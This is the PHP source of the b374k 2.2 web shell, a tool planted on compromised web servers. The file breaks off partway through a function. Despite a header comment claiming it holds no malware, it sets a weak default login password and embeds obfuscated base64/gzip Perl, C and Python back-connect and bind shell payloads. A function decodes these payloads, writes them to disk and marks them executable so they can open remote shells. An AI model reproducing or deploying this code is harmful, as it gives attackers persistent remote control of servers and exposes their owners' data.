b374k_2.2_src

1. <?php
2. //*********************************************************************************************************************/
3. // b374k 2.2
4. // no malware on this code, you can check it by yourself ;-)
5. //
6. //
7. // encrypt your password to md5 here http://kerinci.net/?x=decode
8.  
9. $s_pass = "e10adc3949ba59abbe56e057f20f883e"; //--> MD5HASH = 123456
10.  
11. error_reporting(0);
12. @set_time_limit(0);
13. $s_name = "b374k";
14. $s_ver = "2.2";
15. $s_title = $s_name . " " . $s_ver;
16. $s_auth = false;
17. if (strlen(trim($s_pass)) > 0) {
18.     if (isset($_COOKIE['b374k'])) {
19.         if (strtolower(trim($s_pass)) == strtolower(trim($_COOKIE['b374k'])))
20.             $s_auth = true;
21.     } if (isset($_REQUEST['login'])) {
22.         $login = strtolower(trim($_REQUEST['login']));
23.         if (strtolower(trim($s_pass)) == md5($login)) {
24.             setcookie("b374k", md5($login), time() + 3600 * 24 * 7);
25.             $m = $_SERVER['PHP_SELF'];
26.             header("Location: " . $m);
27.             die();
28.         } else {
29.             setcookie("b374k", $login, time() - 3600 * 24 * 7);
30.             $m = $_SERVER['PHP_SELF'];
31.             header("Location: " . $m);
32.             die();
33.         }
34.     }
35. } else
36.     $s_auth = true;
37.  
38. $xback_pl = "dZFfT4MwFMXf+RQVmSvJEuYzqcmCaJZlYwH0xT+EwVUbR0vaLmZx87PblqnEbG/33HPOL7dwfhZspAhWlAUtiLWzkYAyXr2DCh2PS0SQ95zoUW6lgoa4Ninf3NChL9gGvlATfOgl9T/Rb2wQJfNsGUcDFMzccO94Y+JVTa1BqhSvoIg3SW/vHy6f9Kbl4kePjaZlXQtCGaiiVJzhQ8VHux2qKWAXhODikbm+Kduw1BeboaA6bngj1GFOlARXnGimHVZbVjaAh6pqh9qV9vU4S6JZnI/Q8qaYLsxgFkWWp/Fkrum2eZReccag+gN0Jx6N8hYYzvLr6WKE3KuLrtE3krv8hBOn6T+n+/T48AvMIWsuocP3lWb2pQZp+Q0=";
39. $xbind_pl = "bZFvS8MwEMbf51PcYre1UKjiy1pxdFXHtnY0VRD/lNneNFiT0maozPnZTYpTEd+F537P5e65vZ63bhvvnguvxqYilmwhAOsu8YnFzqPZLKBdsX2kPuEru6t/wLP3okXubGBH9cNkzhZR2AdvSv2tZsE+GaVnl3AEBw5sAF+5sg8cH7bEmk1YFsX5IkmzwDLQ9f6tT9YtApPFEyr9ed1IJQtZBQ+ouvf9m1g+oz1URT10fNJ2oM3cweI0n8RR5g5YEk5zlqXRaO5++x14f4eSo02xaWRzI6gxozJ+WZsGLJnlxqpbsCRPowsWjcbj1NWzEr16qREDL8uyybmwfw/vTmKD5qP4yvn3o4q3CoXucLgrA9VBvjzyCnUYZEOWRYF6jDCJY5c5XcY926p5Gaxk8+QYpHOFSyGkAiNSMOH2SlxxgSUYWBtljQJYNp7ELj0amH70R0wuMpce/1WjNP2l4isWX+f8b5Wikvo+hjUoV7Dvky3ZfgI=";
40. $xback_c = "XVFNawIxEL0L/odhhZJocF2v2oKIBSmtontrZVmTbDd0TSSJxQ/8702y1loPSWbmvXkzvLSEpNWOcRgay4Tqlk/NRuuvdjCxUfSL2ztAcivciYUMgJAWNrmQyAe5/qQEaJlraLv4+32FTzWlYINmw1i9oxa8bM6YzoQEI6QDWM43SqKE9LCnOWl3siLfiOoAjzB6zqZvk/QG2iptHVBaJQ3KrRIojEtW+FbAD+ma8Diy3zrENbe/8tT1kWv1WyBuwYrLK95JOreVi3rBnFhtDbpsRmA5G79ky3QxGb0SmM7ni1k6y9LxHIPrEAUgRJWUnFpUMALozgloY3hwGxPnx5Gr4h7HGA97+LTlWiuNovB8yAgP+F5Y5Ew7Ow93234QDx5es+Rf1vcZ33NaoSheCxmbMiKRv1D9azh000oZ7hp8fP4B";
41. $xbind_c = "dVJhS+QwEP0u+B9yFW6Ttex2BT/1erCcCiK3B+oXUSkxSe1gNylJVl0W//tNmha0KrRJ5r2XzMtMDkCLZiMV+eW8BDOrf+/vHbzDLOjHMbh1c79tlfsCd0Y8KT8itPKA/xz0iFDW6pgStCdrDppy+yhSHJ5ZBEOc7++JmlsynQYi30UmpKpkSrR6qSRK0OtGRJhLaUvQxKq18Qo5qGhl7BNlpChIxggeEbmZA11WfA3NlhRkeVaer06v8w9sa6xHrvZGO8q9geDx+XZxz9hHYcg6c93U6xt6vlqenFyWy9VNEEfLSMYy0T5fevXvz0V5dX15uvybZiz6/RHFjLRYJWNp0k13Ogn8A2hJ+wLQ0cXJlP2MrlKSvS668xpwXulhx3GAXmpoFF0wLEVXwYILoVo/aLJoRG7aI9rxn+LFKD4KsXpVoqHJHA3OXZ2kSRho7B7rThCNcSpuCeHb8IWWirrlzvXyB+7wBnGttFdWSda3HnAj9pNCkeUQHmmDlxs0ORwe4uPZdVXswVu4D52f3OkJUu9BxLJJ/qXWfqcNbiuCHfJWrFvaGR2ys/Ak/MZqkgXlfw==";
42. $xmulti_py = "lVNda9swFH22wf9B9R4qk9T56PYS0CCMlJYlzWgyGHQjuLZSizqSkZS2+ffVvbKb0GSM5SHWx9E5514dfTrrbY3uPQjZ4/KZ1DtbKhmFYlMrbYkyXWJ28KfyJ267xIoNj8LZ+NdqOrllg/7wcxQurifTKYuR4yEzJbnI4yhc3swmq/nPJbvs96Pwx/xuyWK3fD1f+EHB18SUvKpovimSURQGplyprWXKpLWquaTI24lJ3AFEqnlWVEJyQxMHlg0aqIK10kQQIYnO5COnlTvstxMkbsEd5r/34o9b1dxutSTNnjeU5VYoSXMlJZ58KUXFyVJvOfJYvcNvUDtHDFDOVf5Mm36Ar4C/5ry2DUwLaWnMtVb6t4xxv9UFUsRXxpMHwInlBKcKAsnkYuALQnCHwZovxv3EmgADi0dFHjeoj2Igt8eZ4iPuKnNuWmDrC6nBAjj42m8XA2j//gbbVeyK4bKg0P8ozPTjM3MZSmHgguWpYJIwNgQyzAYs3A9cKWjwAHJ5DAkwRDgd4gnnlPBXYekgaaIGfYdBgoouUq6jTzQ5Y2gf7CC+7/Yh2sznO/Uf2szGV6ub28myTX+6mH/7vlos7ybjWXPOFWrhSbhSaRv45GSRiHYvpKD0vFJ5VpXK2PMuQZNJC6iEse4g2NJbyfy1+RC6OfCcaA7GEj2m0HyeW0qhQwfk/04lVJGaivOafknecwmqrHkUIAA778EA2QDfSjcrCp1gE9MsByX636qD06r4FI/qHo6Iz1m5tYV6kXR45Iw09+M6HseHbshfRD1+T/gG";
43. $wmulti_c = "7Vh3WFPZtj8pkEASEiQISDsoCigdRkCDJAICChIBFQtCGhhNMzmhSAsTUEOMxq4ICg6jjgURlSpFcChWHBsKKDrohRvaIBcYUc8NI3e+Ke/73n/vj/fe+r619lm/Vfbae/+x9zphG9UACgAAtJZhGAAqga9EBf57kmnZwLraALiud9+mEhF63yZqK1cCisTCBDGDD7IYAoEQApkcUCwVgFwBGBAeCfKFbI4zgaBvO5ODHggAoQgUYE+zCPtP3h6AiMIhkN4AqFVIWhYBgHrfzISFM9VN48ivdSNm6v+NSmdivpq1BM7opN9x0h8Xoc1HQQD/47SWHu3624foDwUh/7a/PVo/t/8s47f1z/q7H/Wrn/vviyuc8SH/za/Bw9nVa3pyG4IeUp9qnPRJj3lrQx4bAMQGWg/tqdgigPDWOBheq3gnH8AWjTCoQBvcE68m9g5W1BMiSZ4taFu64aw+BGBINqgZTKpBY/R4aIO9qsCRFu2cigD+EH/KllQEutq2YNFoOsYDqNWUP9A1wc8f08W6kS4VYYcT4VfknAbpSsJ1pbGtu4KExznKe1+MZ9SMYAibzW4qfRTo5V++bBxAF62KANMUTXNvKywmJqphA0MLpWXPle9CFir9Sfay/MBq3j0j16tCa3d6vxAGVNACAJ5iDVebViN/go2fMMYAC7Xq+oJ3u8juL6wRLt3CinGyMhBbj/A9YNiQtNRXpSs+MWT5alWNh6X9cmyNSRec/kQ+iSBmw4TZxJwLGLeGT7UvvshvkzfFNKJph6ENvkd1zX0PTX2pei19o7nhq4O9AgX6WhrdX19jqUagIUkkVEq+NSTAqBLL2iv7Yc3pKygz1wm3zv5tRF8cZmlqzZoD2QLQVO3Xv5nV4Yh1aV7n0nmAkNjvH4ZQtnra2WDEDHMc7u41azE2p1OqL+7/og4zHTeFNENqYH/Zz5avjYkBSoIjkNMGuV0GqFbNV1JtI+C50QSqn6Fjre9zn7ez9ezcb7Y1VY4/fDn1WfPPcPz69esiK/fO2rXM69cdyU/GTN0DD1tLaoSKRlVBcn4VZpm/4vWHiyfiJa9bcoxIBL00tEdiqvN8GXpzkIKck+9n9nqH3DduLyKDXBTwitSlaI7fPzoYBurU+bjSVDl9n0uWPnA2Pdygh1/khxow81u0HEnc3xtDBjAiXbNeEh67alfbUcaqAL9whURCHMy5Phg/qDFtuD24G/Kqz+gYzCke7EUr16vv19YS+1YAs1OV/PIFXfEtHiuIFc2Poq99021Bibd8qdw4NBZ/7uXGFy1Pl+anH7XAc5Hn9V3mpCViltqOrEYeLOgruNToPnGfOa64UYq9SsS5xxEzXVXc1kr741dj3ysoQsdt7zqMhrCN/Y+NSHb3DD2Hfl2wSRTc5dnowBe+Hj6uVEWpbtBLrSY+XNh8L3DOF3hP/Up9ZQRe6a5o+VCMaH0Tg70ycBJ95/JZzzTTuc2FhnDgkQPvX+yNOtIahR7mJalD//nlXHqxxjCNX1ll/m07Ym1B4JNoaRelt6kM2dPLRSMMA7xw5+53VO1wvDRaMnE2NXngUYhivDmbsHMzZrD6LDeP088aSrb+51nzYi5/WINhF//AzRsBBpxP28Zeo5lcRlsetr2UttsruMkWRFmYYhal2rDVJASm/h/bN+pG2VNMZyMLCgSnPPWw/c9DiJsPvazvTOpvIao4Y5u2xLY1rhq1bKrlm/D2dNTZnx7+8P2B3isjazfvFPoBxNLd+49NGRYHN50cPZ7dtoRNcoUuHTMYJyRCJIPbskoq25eSUj4See38sCvgCLSC8nx7W5BmkN0I2c1DUp7FqUlwZK6uK5VgNO+YxfVH54Yd50N7lwbk32wPdokuo5xbrP/ldT9nuL90IblFRwzUN4FwCfWBBrEi14pY3tS7D64dyRjK7oRCiuZn7qZ+h1VtQciWjQjrP8+Vmmh0svc4+eeiKPh/+WvMZenPY8u6+U8tiXsCnwc0QO+avTqaK1DfSBCaM64d5++ll2RbLzXDVJppLE6ibtvcrj6Gtewj8amT8iZ5OlZHiv/RwvyF/nUhBZ5vyjwJY1zZapou6G2hlWaOnuRAXTO2PcWWr2l6y7bOz48O/Qa3+FUFrpleoF/g1v4DjvKd24cdtr8SzwQfK5djhEKD8WZEj5yAtzdZxCMm/pSCQ040WsoWGszbnaaLBhBYZHrwBxtS1ls0OH5LmDp5yIEqewdKnZ/Ltvvqpg28f5VomULgJdt4UyH9LKKdcGgNflNMk0zSbGqbl4ADEI/3B3+ulx/LVsSMRUknFc8U6Z8UD6UEZfTW7nKS0kCJH/BraF0V0jOW8g/Yhnf5x+V2iZSu1IuDj8pvOKCTbBf20ozieLS6J25Ug1bErdCYuxBpMdYgyKXNo4M0QN27O+iQ5sgJrF9/7KB+8V3PVk/vz8XR4cu9xkhj3qqbdrB9Ecn1eZdk9G3Po2uvVnZ21lU20Kyc0FkYi6mkqRHHOxkvDXA1szPslb4YibIezoGlVspvbuuNS8kNrbRJepJypOYeVh2rNOrGZ8ZmQ0uyppwkeXW5ivSecjjavAqdjxhRklBG8qbPa4sSanTufLygH7pQ3P1sIuxB+36HjHp5KhYRvrO8qoQVYeKGtyPKK+B9llfWaTys5R9BKBWNhVLrKgajHR7qkrp7IT8jQWT4Tw/w0T56W5S476PfdndGxowgfnFR+khrD5EGrgwNn01e5XBHRVlCrTqhWtt7in1wMFFT50TKtqQgMKM3iIUo7yRjdO7Q4LNHWXeYsDviY1+vpsSgdOP4QbhWDdSfLzqssR/IOG4iZC1d14VX0c9TQWMcKVtFIPW3ycsf8vnJSz9UWo7ZlEzBuTmX62uFF4xUngXEYXi2fAgtf7S9Kb5FOk5st7gz6nebtGpTa1RQc6KfiwJrNjie4Y9QknPcJqUjB1yuHzAnYPNAOjKpuVHOI4JtmqxDoXxv05qL4/COT4o1GY1jcUgkZF/XPn9DA/qEcJmR7KPevLvx5eA5LHhqrn78QDfkM1vRDq0gH+GIUquHd0lJGgqFlN3wEHLuzMgqv4Xw5+lJ+zRziBTvS1mdPH1DS+not7rW0l/KSaNR8yD6uEedrCGHuAdCP5c+cZbvy+uyVUP4R9hlRYgmHAZDF2yYF136slbF+NS0pj/QJb3xh8RUaJwhPZN5p95KL8e/8+cNDz3pYKUujxp88PE10VDL47irIXYxV7JPdx1P83UMTmtf++BTk5t+eJzG4OK43ojPy8GYyVVZj96slC2hnVM8IGKq8fwpuTddOu/KZEmBzubX6kM0Was5cwM6xQZNo4zZ7fsla+BexemqM6U0xfN5SYok68D6qw78OtnCOf9ql0dNZa+J/+7Bq8tgwgCd0lSF889Meno98EILCtfib6q0CF9drmvvGozlVROXvtINLbTqvLEuJkeqczWzv2K+Fep1sOKlzZ19CLOf5G/B9ebGX+SNtD0kn5HhhYkXfMQdTQ7nn+9H7414Dez6dnB5XKlPE0RNFsxDhV4KcLV+sy7XeJl+4AZjb+XbdseT2FDKdyeymlbTNhJpmng1LiW5Q9Pudox+htbS2LnmE3bH/oLM4VKxcVY/Rq4HOJGTNA77z1ZU3yIpXtxTYm/SjeVp72aFtzIw7fcM3FvBrj4ssxe0Cx9jfEIz8ykpox0MgDnAmNSa5KV78rUSX3i9WCvdz1/K1srWw8dvVmoHUL1XNu2zlRc37cPeLDrYg3ePhkwKS1+IkDchkpHhUMN7SRqlk9axDICtzy88CEREhkW2f4HhSCCCwxdCHDCSI07ksjgSMIwhYCTgZV6gqfVC9FyqLup86/xeOGgNgsdlJrC2xUqcd2vj2DweELsyMTaCk8CVQByxP48hkXAkRMdKcv5mL1MjVObU8ClnZxektjuAuHyOi8hByhY6iTnwIDzFE7KcWdbruGJIyuCtkYakgPYMNlvsaN4BD4ILmCgJdydHGG/PdHAIQi5OnFq8h+Xk6YxwcznCMoIrYKILSyiI5ya4cD28F+NSEvhcQYKTZCsD5g8I+WwnNgNiiFxjFoBz/YVSHlvYCY8L7CDQHBJzOYkcUMA4BYrAIP/U1AfV/lHgYhBECflz5eOl9d2OTsuOg76+hbGxXEBZgI91iA1kCyuivewlfDxr69zdw6vZgsmdgJNlaMhy/4lBGN4QFBayOsgpMNgpKiDMzSlyZejKOVHBEU6zycZxY+s93I8V63/LM+oF1shKOUcsqCVx6HjHc6VtFFQAc+Njz7DHvIx9lxrullTx2pl2Qx9ReNYcLei5YHFwNG/anKE+W9d1f7wsrHecFaTLRs1eMG32XEHfyPwtOlmWe9C50zMsr7ikkr2qkZt3dns76lXfyJdOz/tlWI4paO/OGY5iLFqIssHNj4wDfMsCX5DjtN1Y3ElS9BFUSxyKrlOOBE4gzzjqHYfvwmWyNQgam02DhHyav5jDgDh0sbA0aROgJyEGJnMhwlh6xyb8Cq7ALogD6a3mV1ybxSD44/kMq1BWp/WluaRQhgQKFC8RE8K6cc8+C9lSHifYhme9NkmcgfuYuoEYCTG+EYUI4oV8Ie0hGJmSyw/g2rDKKs7WcMUp8ZHSCI4AMv78rNlqrWDrBnbJDyKIKxRcrpp9/QKvxYJM2uyF26Z7QAJ5bUimtRGLMN+HYSfPRfvzhBIO9nO8//GLhuTqcNGuMGxlZqS/LbEUDGizpBnqnCxI94fEvGDxDyabZkvuD2ROjPkamECpqCXvJaKN5eHXfHy/L2uNjU2BXiYtIvO4jgkSAxGy8Vb5M7lHl4AQzxfsFLq85thLYhkiQyhFRNz1Ps/maRx2y/P7eZtEGAemjpdB/YepAWcfBlNox4AwQq4mbxFOL37OwUMsbN2igJNZvF8wHD5LlHI/vnOLhJtwgHeulhyx3ih+32AkLRLc7oDr+faFNxTGKl7NlDS+Zz5kSezwuYJCszMVzm+2mkDMlCaD7oEy2VYBT/cXHvMia3BYI9kqhdjCJD1tj/0Udt2ZEorQ0TbZc79219sFYR+0HTYZRGJIhiSbM6Jr51ypOJNrTRY7It9QRHhR3bUOhwVWVBKG5L7TxppACtbN7yh5s9C5GMJgZ6nPuGxaTL6dR49z7pjY5ZM+jn5iavfjqdoYqmmDs9i+AUFK+Hgg325OHNWZWXXycgwYrqbLHML7X2EPcc3jzidZkOXoRW4PpltVQ0ANAPDvPWpcnbGMCqjqNPtheL0Gp87VXbEHE4TolGKUVvKhT4ad4sHK6Xb9D4hhA6JTMizVm1ElvW5t8j6UmHCrB6uNlo/AEKT48Y/+bX9SpCDtL8Y/JZPfQmZ9Bj7AsPwRQkV2kX/+lEjMRS7XFhUinehnwTCsViLljWgFRt6Clvejk35BPOwP1cJbFBNVcm03Xto3WiI1kfkhpBNKTPytPuytBtKu2w6TiJGLmp9VdUAcACgxeg0QRRmLVmW7Tm8H4gNd3oKFj7K130dyMUHYBqhL8ev64NGStfDRrVpQ645RoORNaM0b+GiyFlCW8LRSm20Ehmum/wHQo7ahI9fDT1W7T2u3SwZmyuLsM6PpUfRpMJqhCrCVbQN8bks/ygdk/ZgsGAb+n/6v0/FCAGAX/hn7XqvL/oKVafU9f8Fqtbq68L/O26rFn2n5vZbHtYwuAoBZRV9t4MzoPDN6zoyrAiNWB4Z6uDsHhIYCtIB1NHrIjMKXJLLEkPP082J9pHvsDAoAoUIGO5TLFDPEKTQA0N4/2quJpb2sxByJBABmnhJaDOKwoN91Gk/70vhdWyHmcLSZpm+y6eDfAoFwEUcw8/TR5o3lCpkAwOQK2P87zvzf";
44. $favicon = "AQYD+fyJUE5HDQoaCgAAAA1JSERSAAAAEAAAABAIBgAAAB/z/2EAAAAEZ0FNQQAAr8g3BYrpAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAphJREFUOMudk8lPU1EUxvkbXAMdXlug2Kp0eu8ViiUIC2wZJJYqkwUqFiqUMjqgAQppUnAIiBKmFoq0thYKBI0GBGMw0ejGxIVLdyYmYDQ0xPD5HokopmXh4kvuyb3nd853ck8cgLhYylymkblIadlzxmNVUXpAuf3vmwOB9pma+DvWhElkhFRhy4Cer/YpaugZ+bdDASfZiktU8+84PaiKqP3Kr+YbOd6CXnqbHpPtltjUzpgAzQK5mTFPRvZaDpBb9KwClFcOyi1H53oT1j+H0O6qgK4mrSUqgPGpTX+khMZHbuYFTiH4YRxPPk5j4KUDklvJqFjOh//1ME70H8VxZyqkDjFTdZ7cYnzue2d87mZ6Kcy+u42epyZcDZegNVwJzTAJiTMFpmkDsgtEn/Y7YHzuMD5BP1R4NF7yy9lgAbxv+3FzqRz2YD7KprJg9BfC92YEQ6sDkHanQG0Uhg5YoKblG6RbBnJchsD7QXQulqIpoEeZWwvDjB731xywzxrwYKUXkk4xxB2i7ymtQuuBGZCjsojRVwTXcysa/TqUTmSh2HMa91a7YZ0qRNVYLgNwQtwmQrJdsJvUSEBUz/8zQNVQ2o/aoAl3VtpQNpmNMxN5cC22w+LRwzSaC8e8DQ2TFiTZBEiuJ46wOYSZe20fQN9V9KW5JOhaakPxuA6uhQ5Y3DpUjuSgZ84G6roSostM1TqiOuY/kPUdWyOauRh7MYiuUD0uMqCeuUZcmWmBsI4PQS0PRA03wjdxmqMCWEmvitekHWI0uGth99RBahPvJQrNvGomUcurSNzkliaAcy6eiApglWoXuZOs/J+CS0xFMxf8Ks6rWAsXd9g2suJf4GzwyhPBPZ9A/BeAFccYv5NoiN+KdvcLtyxxEwhxgvoAAAAASUVORK5CYII=";
45. $style = "tVbJbtswEL33KwgEBVrAMrS4biKfggL9gqLXghIpiwhFChQd2xHy7xUpyhwtdlIgFS+2PJzlvTczziQ5tyjD+dNeyYMg6V1onx0qpNBBw15oGkX1yX0vcMX4Of2FS1nh1W+qCBZ49agY5juUSy5VelcUxQ69orsKMzF2Hdlnh2pMCBP7NK5P6N74Dir5EmRSEaoChQk7NCmKQvPL4ssjI7pMozD8bAOVFHc2Laqw2jORhj5A91HTkw4wZ3uRclpocAFpcuWONymjFgAR2+jA0N8OjjR7YjrQCoumkKpKkZIaa/oliJJ18p3Q/VdX520TGBvhFoDqcPXvNj/uk8efrkRCc6mwZlKkQgpqLNfGEROFbAcYDQJpxyZqJGcEXTy4OrawPENO2J3IvnXedMbbCfzD+wbpjoOSsn2p03hjLj1TpVmOucO/YoTwPrM9PuMVWj8b2ibVWLiPvZtMcmLtreGHYcyp1h0aTY1zV2kvWCoOy4IdeEYGlK405K6szZWKofaC2maQtJfGhEHoP34wZ/c+Qpey/jBIljpws9CAm1HhaSktM7CmZGvOrdTezmzUD2sm6oN+6eRSK1nVuvtAnzHPJaHLbPUpw56OQSWZ1FpWsAuSB3PmE2/Wei6BdlmjPinYIK4hkphWoJjsoNtZvFEtD+bMlHERIuAGlhLbp0/nVHdXJ9lAmYbQzIyVq3NksDED8yqKQ+jLeOz7gDNBg1tTQct6HKT03ZQM3QQBF51SzLoZNdKs7m4aLakzujfHGja0yg7izFpEWFNzfHYF+/nue7ibDoo2B96x9o+7as7RwOVsZECo+qm7pG6nCIwxkIMFu2e0NpxPSDDSLWuzCpDGGb8iisj46LOGF0h7K4/cPt7J1lWze1spMEi5ssQvUbXYbMPFMm7hilfGatTJ38AwTkK308IJtLk5AAiLwWTebie4mMhXSxw4BvZ+bw+Qmb3G6LFgU0IAra5R34Pl4MsyBrf45ub0Gzxc6ZLBa95BSoX2ns3MuqirOmfy9B96I5ruU4uHF3sf2HKx8E/OW14nyj7e1dIfHNX8GZrfu45u7xTgt5BSmzE0lynwtr1MuV62SwqMwVLyvJeqXdwDu9dPfwE=";
46. $sortable_js = "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";
47.  
48. function swd($p) {
49.     $ps = explode(DIRECTORY_SEPARATOR, $p);
50.     $pu = "";
51.     for ($i = 0; $i < sizeof($ps) - 1; $i++) {
52.         $pz = "";
53.         for ($j = 0; $j <= $i; $j++)
54.             $pz .= $ps[$j] . DIRECTORY_SEPARATOR; $pu .= "<a href=\"?d=" . $pz . "\">" . $ps[$i] . " " . DIRECTORY_SEPARATOR . " </a>";
55.     } return trim($pu);
56. }
57.  
58. function rp($t) {
59.     return trim(str_replace("<br />", "", $t));
60. }
61.  
62. function cs($t) {
63.     return str_replace(" ", "_", $t);
64. }
65.  
66. function ss($t) {
67.     if (!get_magic_quotes_gpc())
68.         return trim(urldecode($t)); return trim(urldecode(stripslashes($t)));
69. }
70.  
71. function ssc($t) {
72.     if (!get_magic_quotes_gpc())
73.         return $t; return stripslashes($t);
74. }
75.  
76. function rs($s_win, $d, $type, $sc, $target) {
77.     $result = "";
78.     $fc = gzinflate(base64_decode($sc));
79.     $errperm = "<p class=\"rs_result\">error: permission denied. check current working directory permissions</p>";
80.     $errgcc = "<p class=\"rs_result\">error: can not compile using gcc</p>";
81.     if ($type == "xbind_pl") {
82.         $fname = "b374k_bind.pl";
83.         $fpath = $d . $fname;
84.         if (is_file($fpath))
85.             unlink($fpath); if ($file = fopen($fpath, "w")) {
86.             fwrite($file, $fc);
87.             fclose($file);
88.             if (is_file($fpath)) {
89.                 $res = exe("chmod +x " . $fpath);
